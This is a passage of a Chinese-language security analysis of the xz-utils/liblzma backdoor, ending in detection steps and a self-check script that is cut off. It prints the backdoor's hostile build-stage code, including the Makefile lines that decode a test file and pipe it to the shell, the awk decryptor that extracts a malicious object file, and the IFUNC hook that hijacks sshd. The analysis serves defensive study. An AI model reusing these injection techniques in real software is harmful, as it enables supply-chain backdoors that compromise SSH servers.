\\\\\n\</span></code><code><span class="code-snippet_outer">        export CC=&#39;\$(CC)&#39;; \\\\\n\</span></code><code><span class="code-snippet_outer">        export DEFS=&#39;\$(DEFS)&#39;; \\\\\n\</span></code><code><span class="code-snippet_outer">        export DEFAULT_INCLUDES=&#39;\$(DEFAULT_INCLUDES)&#39;; \\\\\n\</span></code><code><span class="code-snippet_outer">        export INCLUDES=&#39;\$(INCLUDES)&#39;; \\\\\n\</span></code><code><span class="code-snippet_outer">        export liblzma_la_CPPFLAGS=&#39;\$(liblzma_la_CPPFLAGS)&#39;; \\\\\n\</span></code><code><span class="code-snippet_outer">        export CPPFLAGS=&#39;\$(CPPFLAGS)&#39;; \\\\\n\</span></code><code><span class="code-snippet_outer">        export AM_CFLAGS=&#39;\$(AM_CFLAGS)&#39;; \\\\\n\</span></code><code><span class="code-snippet_outer">        export CFLAGS=&#39;\$(CFLAGS)&#39;; \\\\\n\</span></code><code><span class="code-snippet_outer">        export AM_V_CCLD=&#39;\$(am__v_CCLD_\$(V))&#39;; \\\\\n\</span></code><code><span class="code-snippet_outer">        export liblzma_la_LINK=&#39;\$(liblzma_la_LINK)&#39;; \\\\\n\</span></code><code><span class="code-snippet_outer">        export libdir=&#39;\$(libdir)&#39;; \\\\\n\</span></code><code><span class="code-snippet_outer">        export liblzma_la_OBJECTS=&#39;\$(liblzma_la_OBJECTS)&#39;; \\\\\n\</span></code><code><span class="code-snippet_outer">        export liblzma_la_LIBADD=&#39;\$(liblzma_la_LIBADD)&#39;; \\\\\n\</span></code><code><span class="code-snippet_outer"><span class="code-snippet_outer">        sed rpath \$(am__test_dir) | \$(am__dist_setup) &gt; /dev/null 2&gt;&amp;1&#34;</span>;</span></code><code><span class="code-snippet_outer">        sed -i <span class="code-snippet__string">&#34;/$m/i$l&#34;</span> src/liblzma/Makefile || true</span></code><code><span class="code-snippet_outer">        <span class="code-snippet__keyword">eval</span> $zrKcHD</span></code><code><span class="code-snippet_outer">    fi</span></code><code><span class="code-snippet_outer">......</span></code></pre></section><p style="margin-top: 16px;margin-bottom: 0px;"><span style="font-size: 14px;">此步骤会对当前环境进行一些检测，是否支持glibc的IFUNC特性，以及构建的可执行文件是否是x86_64架构的。除此之外，还会检测源代码项目中是否存在/debian/rules文件或$RPM_ARCH环境变量是否设置为x86_64，只有通过检测，才会修改/src/liblzma/Makefile文件的内容。所以，包含后门的xz-utils项目只能在特定环境下，才能成功构建。<br/></span></p><section style="margin-top: 16px;"><span style="font-size: 14px;">向/src/liblzma/Makefile文件中写入内容的关键部分如下所示。<br/></span></section><section class="code-snippet__fix code-snippet__js"><ul class="code-snippet__line-index code-snippet__js"><li></li><li></li><li></li><li></li><li></li><li></li><li></li><li></li></ul><pre class="code-snippet__js" data-lang="makefile"><code><span class="code-snippet_outer">am__test = bad-3-corrupt_lzma2.xz</span></code><code><span class="code-snippet_outer">am__test_dir=<span class="code-snippet__variable">$(top_srcdir)</span>/tests/files/<span class="code-snippet__variable">$(am__test)</span></span></code><code><span class="code-snippet_outer">am__strip_prefix = tr <span class="code-snippet__string">&#34;\t \-_&#34;</span> <span class="code-snippet__string">&#34; \t_\-&#34;</span></span></code><code><span class="code-snippet_outer">am__dist_setup = <span class="code-snippet__variable">$(am__strip_prefix)</span> | xz -d 2&gt;/dev/null | <span class="code-snippet__variable">$(SHELL)</span></span></code><code><span class="code-snippet_outer">sed rpath <span class="code-snippet__variable">$(am__test_dir)</span> | <span class="code-snippet__variable">$(am__dist_setup)</span> &gt;/dev/null 2&gt;&amp;1</span></code><code><span class="code-snippet_outer"><br/></span></code><code><span class="code-snippet_outer"><span class="code-snippet__comment"># 实际执行的命令</span></span></code><code><span class="code-snippet_outer">sed rpath ./tests/files/bad-3-corrupt_lzma2.xz | tr <span class="code-snippet__string">&#34;\t \-_&#34;</span> <span class="code-snippet__string">&#34; \t_\-&#34;</span> | xz -d 2&gt;/dev/null</span></code></pre></section><section style="margin-top: 16px;"><span style="font-size: 14px;">这部分内容用于在通过make命令构建整个项目时，第二次执行good-large_compressed.sh脚本。<br/>第二次执行的good-large_compressed.sh脚本中的主要代码如下所示。<br/></span></section><section class="code-snippet__fix code-snippet__js"><ul class="code-snippet__line-index code-snippet__js"><li></li><li></li><li></li><li></li><li></li><li></li><li></li><li></li><li></li><li></li><li></li><li></li><li></li><li></li><li></li><li></li><li></li><li></li><li></li><li></li><li></li><li></li></ul><pre class="code-snippet__js" data-lang="ruby"><code><span class="code-snippet_outer">......</span></code><code><span class="code-snippet_outer"><span class="code-snippet__comment"># 第一次执行此脚本时，是在源代码根目录下执行的。</span></span></code><code><span class="code-snippet_outer"><span class="code-snippet__keyword">if</span> test -f config.status; <span class="code-snippet__keyword">then</span></span></code><code><span class="code-snippet_outer">    ......</span></code><code><span class="code-snippet_outer"><span class="code-snippet__comment"># 第二次执行此脚本时，是从/src/liblzma目录下的Makefile中执行的，所以当前目录为/src/liblzma。</span></span></code><code><span class="code-snippet_outer">elif (test -f .libs/liblzma_la-crc64_fast.o) &amp;&amp; (test -f .libs/liblzma_la-crc32_fast.o); <span class="code-snippet__keyword">then</span></span></code><code><span class="code-snippet_outer">    ......</span></code><code><span class="code-snippet_outer">    <span class="code-snippet__comment"># 从good-large_compressed.lzma文件中提取liblzma_la-crc64-fast.o文件，存放在/src/liblzma目录下。</span></span></code><code><span class="code-snippet_outer">    xz -dc $top_srcdir/tests/files/$p <span class="code-snippet__params">| eval $i |</span> LC_ALL=C sed <span class="code-snippet__string">&#34;s/\(.\)/\1\n/g&#34;</span> <span class="code-snippet__params">| LC_ALL=C awk &#39;<span class="code-snippet__keyword">BEGIN</span>{FS=&#34;\n&#34;;RS=&#34;\n&#34;;ORS=&#34;&#34;;m=256;<span class="code-snippet__keyword">for</span>(i=0;i&lt;m;i++){t[sprintf(&#34;x%c&#34;,i)]=i;c[i]=((i*7)+5)%m;}i=0;j=0;<span class="code-snippet__keyword">for</span>(l=0;l&lt;4096;l++){i=(i+1)%m;a=c[i];j=(j+a)%m;c[i]=c[j];c[j]=a;}}{v=t[&#34;x&#34; (NF&lt;1?RS:$1)];i=(i+1)%m;a=c[i];j=(j+a)%m;b=c[j];c[i]=b;c[j]=a;k=c[(a+b)%m];printf &#34;%c&#34;,(v+k)%m}&#39; |</span> xz -dc --single-stream <span class="code-snippet__params">| ((head -c +$N &gt; /dev/null 2&gt;&amp;1) &amp;&amp; head -c +$W) &gt; liblzma_la-crc64-fast.o |</span><span class="code-snippet__params">| <span class="code-snippet__literal">true</span></span></span></code><code><span class="code-snippet_outer">    ......</span></code><code><span class="code-snippet_outer"><span class="code-snippet_outer">    cp .libs/liblzma_la-crc64_fast.o .libs/liblzma_la-crc64-fast.o |</span><span class="code-snippet__params">| <span class="code-snippet__literal">true</span></span></span></code><code><span class="code-snippet_outer"><span class="code-snippet_outer">    V=&#39;#endif\n#<span class="code-snippet__keyword">if</span> <span class="code-snippet__keyword">defined</span>(CRC32_GENERIC) &amp;&amp; <span class="code-snippet__keyword">defined</span>(CRC64_GENERIC) &amp;&amp; <span class="code-snippet__keyword">defined</span>(CRC_X86_CLMUL) &amp;&amp; <span class="code-snippet__keyword">defined</span>(CRC_USE_IFUNC) &amp;&amp; <span class="code-snippet__keyword">defined</span>(PIC) &amp;&amp; (<span class="code-snippet__keyword">defined</span>(BUILDING_CRC64_CLMUL) |</span><span class="code-snippet__params">| <span class="code-snippet__keyword">defined</span>(BUILDING_CRC32_CLMUL))\nextern int _get_cpuid(int, void*, void*, void*, void*, void*);\nstatic inline bool _is_arch_extension_supported(void) { int success = 1; uint32_t r[4]; success = _get_cpuid(1, &amp;r[0], &amp;r[1], &amp;r[2], &amp;r[3], ((char*) __builtin_frame_address(0))-16); const uint32_t ecx_mask = (1 &lt;&lt; 1) |</span> (<span class="code-snippet__number">1</span> &lt;&lt; <span class="code-snippet__number">9</span>) <span class="code-snippet__params">| (1 &lt;&lt; 19); <span class="code-snippet__keyword">return</span> success &amp;&amp; (r[2] &amp; ecx_mask) == ecx_mask; }\n#<span class="code-snippet__keyword">else</span>\n#define _is_arch_extension_supported is_arch_extension_supported&#39;</span></span></code><code><span class="code-snippet_outer">    eval $yosA</span></code><code><span class="code-snippet_outer">    # 将crc64_fast.c文件crc64_resolve()函数中调用的is_arch_extension_supported()函数替换为_is_arch_extension_supported()函数</span></code><code><span class="code-snippet_outer"><span class="code-snippet_outer">    <span class="code-snippet__keyword">if</span> sed &#34;/<span class="code-snippet__keyword">return</span> is_arch_extension_supported()/ c\<span class="code-snippet__keyword">return</span> _is_arch_extension_supported()&#34; $top_srcdir/src/liblzma/check/crc64_fast.c |</span> \</span></code><code><span class="code-snippet_outer">        <span class="code-snippet__comment"># 在crc64_fast.c文件include &#34;crc_x86_clmul.h&#34;语句下添加一段代码</span></span></code><code><span class="code-snippet_outer">        sed <span class="code-snippet__string">&#34;/include \&#34;crc_x86_clmul.h\&#34;/a \\$V&#34;</span> <span class="code-snippet__params">| \</span></span></code><code><span class="code-snippet_outer"><span class="code-snippet_outer">        sed &#34;1i # 0 \&#34;$top_srcdir/src/liblzma/check/crc64_fast.c\&#34;&#34; 2&gt; /dev/null |</span> \</span></code><code><span class="code-snippet_outer">        <span class="code-snippet__comment"># </span></span></code><code><span class="code-snippet_outer">        $CC $DEFS $DEFAULT_INCLUDES $INCLUDES $liblzma_la_CPPFLAGS $CPPFLAGS $AM_CFLAGS $CFLAGS -r liblzma_la-crc64-fast.o -x c -  $P -o .libs/liblzma_la-crc64_fast.o <span class="code-snippet__number">2</span>&gt; <span class="code-snippet__regexp">/dev/null</span>; <span class="code-snippet__keyword">then</span></span></code><code><span class="code-snippet_outer">        ......</span></code><code><span class="code-snippet_outer">fi</span></code></pre></section><section style="margin-top: 16px;"><span style="font-size: 14px;">此步骤会从good-large_compressed.lzma文件中提取出预构建的恶意liblzma_la-crc64-fast.o目标文件，并对/src/liblzma/check/目录下crc64_fast.c和crc32_fast.c中的内容进行修改，修改的内容如下所示。<br/></span></section><section class="code-snippet__fix code-snippet__js"><ul class="code-snippet__line-index code-snippet__js"><li></li><li></li><li></li><li></li><li></li><li></li><li></li><li></li><li></li><li></li><li></li><li></li><li></li><li></li><li></li><li></li><li></li><li></li></ul><pre class="code-snippet__js" data-lang="cpp"><code><span class="code-snippet_outer"><span class="code-snippet__comment">// crc64_fast.c的修改内容，crc32_fast.c与此相似。</span></span></code><code><span class="code-snippet_outer"><span class="code-snippet__meta">#<span class="code-snippet__meta-keyword">if</span> defined(CRC32_GENERIC) &amp;&amp; defined(CRC64_GENERIC) &amp;&amp; defined(CRC_X86_CLMUL) &amp;&amp; defined(CRC_USE_IFUNC) &amp;&amp; defined(PIC) &amp;&amp; (defined(BUILDING_CRC64_CLMUL) || defined(BUILDING_CRC32_CLMUL))</span></span></code><code><span class="code-snippet_outer"><span class="code-snippet__keyword">extern</span> <span class="code-snippet__keyword">int</span> _get_cpuid(<span class="code-snippet__keyword">int</span>, <span class="code-snippet__keyword">void</span>*, <span class="code-snippet__keyword">void</span>*, <span class="code-snippet__keyword">void</span>*, <span class="code-snippet__keyword">void</span>*, <span class="code-snippet__keyword">void</span>*);</span></code><code><span class="code-snippet_outer"><span class="code-snippet__keyword">static</span> <span class="code-snippet__keyword">inline</span> <span class="code-snippet__keyword">bool</span> _is_arch_extension_supported(<span class="code-snippet__keyword">void</span>) { </span></code><code><span class="code-snippet_outer">    <span class="code-snippet__keyword">int</span> success = <span class="code-snippet__number">1</span>; </span></code><code><span class="code-snippet_outer">    <span class="code-snippet__keyword">uint32_t</span> r[<span class="code-snippet__number">4</span>]; </span></code><code><span class="code-snippet_outer">    success = _get_cpuid(<span class="code-snippet__number">1</span>, &amp;r[<span class="code-snippet__number">0</span>], &amp;r[<span class="code-snippet__number">1</span>], &amp;r[<span class="code-snippet__number">2</span>], &amp;r[<span class="code-snippet__number">3</span>], ((<span class="code-snippet__keyword">char</span>*) __builtin_frame_address(<span class="code-snippet__number">0</span>))<span class="code-snippet__number">-16</span>); </span></code><code><span class="code-snippet_outer">    <span class="code-snippet__keyword">const</span> <span class="code-snippet__keyword">uint32_t</span> ecx_mask = (<span class="code-snippet__number">1</span> &lt;&lt; <span class="code-snippet__number">1</span>) | (<span class="code-snippet__number">1</span> &lt;&lt; <span class="code-snippet__number">9</span>) | (<span class="code-snippet__number">1</span> &lt;&lt; <span class="code-snippet__number">19</span>); </span></code><code><span class="code-snippet_outer">    <span class="code-snippet__keyword">return</span> success &amp;&amp; (r[<span class="code-snippet__number">2</span>] &amp; ecx_mask) == ecx_mask; </span></code><code><span class="code-snippet_outer">}</span></code><code><span class="code-snippet_outer"><span class="code-snippet__meta">#<span class="code-snippet__meta-keyword">else</span></span></span></code><code><span class="code-snippet_outer"><span class="code-snippet__meta">#<span class="code-snippet__meta-keyword">define</span> _is_arch_extension_supported is_arch_extension_supported</span></span></code><code><span class="code-snippet_outer"><span class="code-snippet__meta">#<span class="code-snippet__meta-keyword">endif</span></span></span></code><code><span class="code-snippet_outer"><br/></span></code><code><span class="code-snippet_outer"><span class="code-snippet__function"><span class="code-snippet__keyword">static</span> crc64_func_type <span class="code-snippet__title">crc64_resolve</span><span class="code-snippet__params">(<span class="code-snippet__keyword">void</span>)</span> </span>{</span></code><code><span class="code-snippet_outer">    <span class="code-snippet__keyword">return</span> _is_arch_extension_supported()</span></code><code><span class="code-snippet_outer">            ? &amp;crc64_arch_optimized : &amp;crc64_generic;</span></code><code><span class="code-snippet_outer">}</span></code></pre></section><section style="margin-top: 16px;"><span style="font-size: 14px;">此修改将crc64_resolve()和crc32_resolve()函数中调用的is_arch_extension_supported()函数替换为_is_arch_extension_supported()函数，并在_is_arch_extension_supported()函数中调用了恶意liblzma_la-crc64-fast.o目标文件中定义的_get_cpuid()函数（一个下划线），而原有的is_arch_extension_supported()函数会调用由gcc实现的__get_cpuid()函数（两个下划线）。_get_cpuid()函数就是对后门进行初始化的入口函数，在此过程中，会修改sshd进程的RSA_public_decrypt()函数的GOT表条目。</span></section><section style="box-sizing: border-box;font-size: 16px;"><section style="margin: 10px 0%;box-sizing: border-box;"><section style="display: inline-block;width: auto;vertical-align: top;border-top: 1px solid rgb(92, 107, 192);border-top-left-radius: 0px;padding-left: 10px;min-width: 10%;max-width: 100%;height: auto;box-sizing: border-box;"><section style="text-align: left;margin-right: 0%;margin-left: 0%;justify-content: flex-start;box-sizing: border-box;"><section style="display: inline-block;min-width: 10%;max-width: 100%;vertical-align: top;transform: matrix(1, 0, -0.2, 1, 0, 0);-webkit-transform: matrix(1, 0, -0.2, 1, 0, 0);-moz-transform: matrix(1, 0, -0.2, 1, 0, 0);-o-transform: matrix(1, 0, -0.2, 1, 0, 0);border-style: none none none solid;border-width: 1px 5px 1px 0px;border-color: rgba(255, 255, 255, 0) rgba(255, 255, 255, 0) rgb(92, 107, 192) rgb(223, 46, 0);padding: 5px 10px;background-color: rgb(0, 0, 0);box-shadow: rgba(255, 255, 255, 0) 0px 0px 0px;line-height: 1;letter-spacing: 0px;width: auto;height: auto;box-sizing: border-box;"><section style="color: rgb(255, 255, 255);box-sizing: border-box;"><p style="box-sizing: border-box;"><span style="letter-spacing: 0.5px;">02</span></p></section></section></section></section><section style="display: inline-block;width: auto;vertical-align: top;min-width: 10%;max-width: 100%;height: auto;border-top: 1px solid rgb(92, 107, 192);border-top-left-radius: 0px;padding-right: 20px;padding-left: 10px;box-shadow: rgb(0, 0, 0) 0px 0px 0px;box-sizing: border-box;"><section style="color: rgb(0, 0, 0);box-sizing: border-box;"><p style="box-sizing: border-box;">后门代码工作原理<br/></p></section></section></section></section><section style="margin-top: 16px;"><span style="font-size: 14px;">上游的OpenSSH不依赖liblzma库，但是debian和其他几个Linux发行版对上游的OpenSSH进行了修改，引入了libsystemd库，使其支持systemd通知。libsystemd库依赖于liblzma库，所以，sshd进程也间接依赖于liblzma库。可通过如下命令，查看当前系统中的sshd进程是否依赖于liblzma库。<br/></span></section><section class="code-snippet__fix code-snippet__js"><ul class="code-snippet__line-index code-snippet__js"><li></li><li></li><li></li><li></li><li></li><li></li><li></li></ul><pre class="code-snippet__js" data-lang="javascript"><code><span class="code-snippet_outer">❯ ldd /usr/sbin/sshd | grep <span class="code-snippet__string">&#34;liblzma&#34;</span></span></code><code><span class="code-snippet_outer">  liblzma.so<span class="code-snippet__number">.5</span> =&gt; <span class="code-snippet__regexp">/lib/</span>x86_64-linux-gnu/liblzma.so<span class="code-snippet__number">.5</span> (<span class="code-snippet__number">0x00007ff5218fc000</span>)</span></code><code><span class="code-snippet_outer">❯ ll /lib/x86_64-linux-gnu/ | grep <span class="code-snippet__string">&#34;liblzma&#34;</span></span></code><code><span class="code-snippet_outer">-rw-r--r--  <span class="code-snippet__number">1</span> root root <span class="code-snippet__number">275</span>K <span class="code-snippet__number">4</span>月   <span class="code-snippet__number">8</span>  <span class="code-snippet__number">2022</span> liblzma.a</span></code><code><span class="code-snippet_outer">lrwxrwxrwx  <span class="code-snippet__number">1</span> root root   <span class="code-snippet__number">47</span> <span class="code-snippet__number">4</span>月   <span class="code-snippet__number">2</span> <span class="code-snippet__number">16</span>:<span class="code-snippet__number">10</span> liblzma.so -&gt; <span class="code-snippet__regexp">/usr/</span>software/xz<span class="code-snippet__number">-5.6</span><span class="code-snippet__number">.0</span><span class="code-snippet__number">-0.2</span>/lib/liblzma.so<span class="code-snippet__number">.5</span><span class="code-snippet__number">.6</span><span class="code-snippet__number">.0</span></span></code><code><span class="code-snippet_outer">lrwxrwxrwx  <span class="code-snippet__number">1</span> root root   <span class="code-snippet__number">47</span> <span class="code-snippet__number">4</span>月   <span class="code-snippet__number">3</span> <span class="code-snippet__number">15</span>:<span class="code-snippet__number">24</span> liblzma.so<span class="code-snippet__number">.5</span> -&gt; <span class="code-snippet__regexp">/usr/</span>software/xz<span class="code-snippet__number">-5.6</span><span class="code-snippet__number">.0</span><span class="code-snippet__number">-0.2</span>/lib/liblzma.so<span class="code-snippet__number">.5</span><span class="code-snippet__number">.6</span><span class="code-snippet__number">.0</span></span></code><code><span class="code-snippet_outer">-rw-r--r--  <span class="code-snippet__number">1</span> root root <span class="code-snippet__number">159</span>K <span class="code-snippet__number">4</span>月   <span class="code-snippet__number">8</span>  <span class="code-snippet__number">2022</span> liblzma.so<span class="code-snippet__number">.5</span><span class="code-snippet__number">.2</span><span class="code-snippet__number">.4</span></span></code></pre></section><section style="margin-top: 16px;"><span style="font-size: 14px;">当存在后门的liblzma.so库编译成功后，可以通过如下命令测试后门代码是否成功加载。</span></section><section class="code-snippet__fix code-snippet__js"><ul class="code-snippet__line-index code-snippet__js"><li></li><li></li><li></li><li></li><li></li><li></li><li></li><li></li><li></li><li></li><li></li><li></li><li></li><li></li><li></li></ul><pre class="code-snippet__js" data-lang="go"><code><span class="code-snippet_outer">❯ time env -i LC_LANG=C LD_PRELOAD=/usr/software/xz<span class="code-snippet__number">-5.6</span><span class="code-snippet__number">.0</span><span class="code-snippet__number">-0.2</span>/lib/liblzma.so<span class="code-snippet__number">.5</span><span class="code-snippet__number">.6</span><span class="code-snippet__number">.0</span> /usr/sbin/sshd -h</span></code><code><span class="code-snippet_outer">option requires an argument -- h</span></code><code><span class="code-snippet_outer">OpenSSH_8<span class="code-snippet__number">.2</span>p1 Ubuntu<span class="code-snippet__number">-4</span>ubuntu0<span class="code-snippet__number">.11</span>, OpenSSL <span class="code-snippet__number">1.1</span><span class="code-snippet__number">.1f</span>  <span class="code-snippet__number">31</span> Mar <span class="code-snippet__number">2020</span></span></code><code><span class="code-snippet_outer">usage: sshd [<span class="code-snippet__number">-46</span>DdeiqTt] [-C connection_spec] [-c host_cert_file]</span></code><code><span class="code-snippet_outer">            [-E log_file] [-f config_file] [-g login_grace_time]</span></code><code><span class="code-snippet_outer">            [-h host_key_file] [-o option] [-p port] [-u <span class="code-snippet__built_in">len</span>]</span></code><code><span class="code-snippet_outer">env -i LC_LANG=C LD_PRELOAD=/usr/software/xz<span class="code-snippet__number">-5.6</span><span class="code-snippet__number">.0</span><span class="code-snippet__number">-0.2</span>/lib/liblzma.so<span class="code-snippet__number">.5</span><span class="code-snippet__number">.6</span><span class="code-snippet__number">.0</span>    <span class="code-snippet__number">0.19s</span> user <span class="code-snippet__number">0.02s</span> system <span class="code-snippet__number">90</span>% cpu <span class="code-snippet__number">0.227</span> total</span></code><code><span class="code-snippet_outer"><br/></span></code><code><span class="code-snippet_outer">❯ time env -i LC_LANG=C TERM=foo LD_PRELOAD=/usr/software/xz<span class="code-snippet__number">-5.6</span><span class="code-snippet__number">.0</span><span class="code-snippet__number">-0.2</span>/lib/liblzma.so<span class="code-snippet__number">.5</span><span class="code-snippet__number">.6</span><span class="code-snippet__number">.0</span> /usr/sbin/sshd -h</span></code><code><span class="code-snippet_outer">option requires an argument -- h</span></code><code><span class="code-snippet_outer">OpenSSH_8<span class="code-snippet__number">.2</span>p1 Ubuntu<span class="code-snippet__number">-4</span>ubuntu0<span class="code-snippet__number">.11</span>, OpenSSL <span class="code-snippet__number">1.1</span><span class="code-snippet__number">.1f</span>  <span class="code-snippet__number">31</span> Mar <span class="code-snippet__number">2020</span></span></code><code><span class="code-snippet_outer">usage: sshd [<span class="code-snippet__number">-46</span>DdeiqTt] [-C connection_spec] [-c host_cert_file]</span></code><code><span class="code-snippet_outer">            [-E log_file] [-f config_file] [-g login_grace_time]</span></code><code><span class="code-snippet_outer">            [-h host_key_file] [-o option] [-p port] [-u <span class="code-snippet__built_in">len</span>]</span></code><code><span class="code-snippet_outer">env -i LC_LANG=C TERM=foo  /usr/sbin/sshd -h  <span class="code-snippet__number">0.00s</span> user <span class="code-snippet__number">0.00s</span> system <span class="code-snippet__number">91</span>% cpu <span class="code-snippet__number">0.004</span> total</span></code></pre></section><p style="margin-top: 16px;margin-bottom: 0px;"><span style="font-size: 14px;">第一条命令成功加载了后门代码，第二条命令未成功加载，加载了后门代码的sshd进程的启动速度较慢。后门代码还会通过检测以下条件，判断是否执行后门代码。<br/></span></p><p style="margin-top: 16px;margin-bottom: 0px;"><span style="font-size: 14px;">1、未设置TERM、LD_DEBUG、LD_PROFILE环境变量，设置了LANG环境变量。</span></p><section style="margin-top: 16px;margin-bottom: 24px;"><span style="font-size: 14px;">2、argv[0]为/usr/sbin/sshd。</span><span style="font-size: 14px;"><span style="font-size: 14px;"></span></span></section><section style="box-sizing: border-box;font-size: 16px;"><section style="margin: 10px 0%;box-sizing: border-box;"><section style="display: inline-block;width: auto;vertical-align: top;border-top: 1px solid rgb(92, 107, 192);border-top-left-radius: 0px;padding-left: 10px;min-width: 10%;max-width: 100%;height: auto;box-sizing: border-box;"><section style="text-align: left;margin-right: 0%;margin-left: 0%;justify-content: flex-start;box-sizing: border-box;"><section style="display: inline-block;min-width: 10%;max-width: 100%;vertical-align: top;transform: matrix(1, 0, -0.2, 1, 0, 0);-webkit-transform: matrix(1, 0, -0.2, 1, 0, 0);-moz-transform: matrix(1, 0, -0.2, 1, 0, 0);-o-transform: matrix(1, 0, -0.2, 1, 0, 0);border-style: none none none solid;border-width: 1px 5px 1px 0px;border-color: rgba(255, 255, 255, 0) rgba(255, 255, 255, 0) rgb(92, 107, 192) rgb(223, 46, 0);padding: 5px 10px;background-color: rgb(0, 0, 0);box-shadow: rgba(255, 255, 255, 0) 0px 0px 0px;line-height: 1;letter-spacing: 0px;width: auto;height: auto;box-sizing: border-box;"><section style="color: rgb(255, 255, 255);box-sizing: border-box;"><p style="box-sizing: border-box;"><span style="letter-spacing: 0.5px;">03</span></p></section></section></section></section><section style="display: inline-block;width: auto;vertical-align: top;min-width: 10%;max-width: 100%;height: auto;border-top: 1px solid rgb(92, 107, 192);border-top-left-radius: 0px;padding-right: 20px;padding-left: 10px;box-shadow: rgb(0, 0, 0) 0px 0px 0px;box-sizing: border-box;"><section style="color: rgb(0, 0, 0);box-sizing: border-box;"><p style="box-sizing: border-box;">GNU IFUNC<span style="font-size: 14px;"><br/></span></p></section></section></section></section><p style="margin-top: 16px;margin-bottom: 0px;"><span style="font-size: 14px;">GNU IFUNC(GNU Indirect Function)是GNU工具链的一项功能，它允许开发人员为给定函数创建多个实现，并在运行时使用同样由开发人员编写的解析器函数进行选择。</span></p><p style="margin-top: 16px;margin-bottom: 0px;"><span style="font-size: 14px;">IFUNC特性虽然为程序的性能优化和平台兼容性提供了更多的可能性，但也存在被恶意利用的风险，其主要的安全隐患包括：劫持函数、绕过安全措施、隐藏攻击载荷。</span></p><p style="margin-top: 16px;margin-bottom: 0px;"><span style="font-size: 14px;">xz-utils源码中的crc64_fast.c和crc32_fast.c文件中的crc64_resolve()和crc32_resolve()函数为liblzma实现的IFUNC解析器。当加载liblzma.so共享库时，这些IFUNC解析器函数会很早就得到执行。<br/></span></p><h2 data-tool="mdnice编辑器" style="margin-top: 30px;margin-bottom: 15px;font-weight: bold;font-size: 22px;"><span style="display: inline-block;counter-increment: counterh2 1;color: rgb(143, 220, 143);border-bottom: 4px solid rgb(143, 220, 143);font-size: 18px;padding: 2px 4px;letter-spacing: 0.5px;">0x05 处置情况</span></h2><section style="box-sizing: border-box;font-size: 16px;"><section style="margin: 10px 0%;box-sizing: border-box;"><section style="display: inline-block;width: auto;vertical-align: top;border-top: 1px solid rgb(92, 107, 192);border-top-left-radius: 0px;padding-left: 10px;min-width: 10%;max-width: 100%;height: auto;box-sizing: border-box;"><section style="text-align: left;margin-right: 0%;margin-left: 0%;justify-content: flex-start;box-sizing: border-box;"><section style="display: inline-block;min-width: 10%;max-width: 100%;vertical-align: top;transform: matrix(1, 0, -0.2, 1, 0, 0);-webkit-transform: matrix(1, 0, -0.2, 1, 0, 0);-moz-transform: matrix(1, 0, -0.2, 1, 0, 0);-o-transform: matrix(1, 0, -0.2, 1, 0, 0);border-style: none none none solid;border-width: 1px 5px 1px 0px;border-color: rgba(255, 255, 255, 0) rgba(255, 255, 255, 0) rgb(92, 107, 192) rgb(223, 46, 0);padding: 5px 10px;background-color: rgb(0, 0, 0);box-shadow: rgba(255, 255, 255, 0) 0px 0px 0px;line-height: 1;letter-spacing: 0px;width: auto;height: auto;box-sizing: border-box;"><section style="color: rgb(255, 255, 255);box-sizing: border-box;"><p style="box-sizing: border-box;"><span style="letter-spacing: 0.5px;">01</span></p></section></section></section></section><section style="display: inline-block;width: auto;vertical-align: top;min-width: 10%;max-width: 100%;height: auto;border-top: 1px solid rgb(92, 107, 192);border-top-left-radius: 0px;padding-right: 20px;padding-left: 10px;box-shadow: rgb(0, 0, 0) 0px 0px 0px;box-sizing: border-box;"><section style="color: rgb(0, 0, 0);box-sizing: border-box;"><p style="box-sizing: border-box;">排查方式一<br/></p></section></section></section></section><p><span style="font-size: 14px;">用户可以通过以下命令检查系统中安装的xz-utils软件包的版本：<br/>xz --version</span></p><p style="text-align: center;"><img class="rich_pages wxw-img" data-galleryid="" data-imgfileid="100012965" data-ratio="0.2037037037037037" data-s="300,640" style="" data-type="png" data-w="270" src="https://wechat2rss.xlab.app/img-proxy/?k=4d674af5&amp;u=https%3A%2F%2Fmmbiz.qpic.cn%2Fsz_mmbiz_png%2FH6W1QCHf9dFhAxQSOMtLLS8kDjp8icNBGmIa3GbsxxN508zl2UofRqTPsRiaqYwtXFBiaia399rkQvmpz0QwE614lA%2F640%3Fwx_fmt%3Dpng%26from%3Dappmsg"/><br/></p><section style="box-sizing: border-box;font-size: 16px;"><section style="margin: 10px 0%;box-sizing: border-box;"><section style="display: inline-block;width: auto;vertical-align: top;border-top: 1px solid rgb(92, 107, 192);border-top-left-radius: 0px;padding-left: 10px;min-width: 10%;max-width: 100%;height: auto;box-sizing: border-box;"><section style="text-align: left;margin-right: 0%;margin-left: 0%;justify-content: flex-start;box-sizing: border-box;"><section style="display: inline-block;min-width: 10%;max-width: 100%;vertical-align: top;transform: matrix(1, 0, -0.2, 1, 0, 0);-webkit-transform: matrix(1, 0, -0.2, 1, 0, 0);-moz-transform: matrix(1, 0, -0.2, 1, 0, 0);-o-transform: matrix(1, 0, -0.2, 1, 0, 0);border-style: none none none solid;border-width: 1px 5px 1px 0px;border-color: rgba(255, 255, 255, 0) rgba(255, 255, 255, 0) rgb(92, 107, 192) rgb(223, 46, 0);padding: 5px 10px;background-color: rgb(0, 0, 0);box-shadow: rgba(255, 255, 255, 0) 0px 0px 0px;line-height: 1;letter-spacing: 0px;width: auto;height: auto;box-sizing: border-box;"><section style="color: rgb(255, 255, 255);box-sizing: border-box;"><p style="box-sizing: border-box;"><span style="letter-spacing: 0.5px;">02</span></p></section></section></section></section><section style="display: inline-block;width: auto;vertical-align: top;min-width: 10%;max-width: 100%;height: auto;border-top: 1px solid rgb(92, 107, 192);border-top-left-radius: 0px;padding-right: 20px;padding-left: 10px;box-shadow: rgb(0, 0, 0) 0px 0px 0px;box-sizing: border-box;"><section style="color: rgb(0, 0, 0);box-sizing: border-box;"><p style="box-sizing: border-box;">排查方式二<br/></p></section></section></section></section><p><span style="font-size: 14px;">通过利用如下脚本进行自查</span></p><section class="code-snippet__fix code-snippet__js"><ul class="code-snippet__line-index code-snippet__js"><li></li><li></li><li></li><li></li><li></li><li></li><li></li><li></li><li></li><li></li><li></li><li></li><li></li><li></li><li></li><li></li><li></li><li></li><li></li><li></li><li></li><li></li></ul><pre class="code-snippet__js" data-lang="bash"><code><span class="code-snippet_outer"><span class="code-snippet__meta">#! /bin/bash</span></span></code><code><span class="code-snippet_outer"><br/></span></code><code><span class="code-snippet_outer"><span class="code-snippet__built_in">set</span> -eu</span></code><code><span class="code-snippet_outer"><br/></span></code><code><span class="code-snippet_outer"><span class="code-snippet__comment"># find path to liblzma used by sshd</span></span></code><code><span class="code-snippet_outer">path=<span class="code-snippet__string">&#34;<span 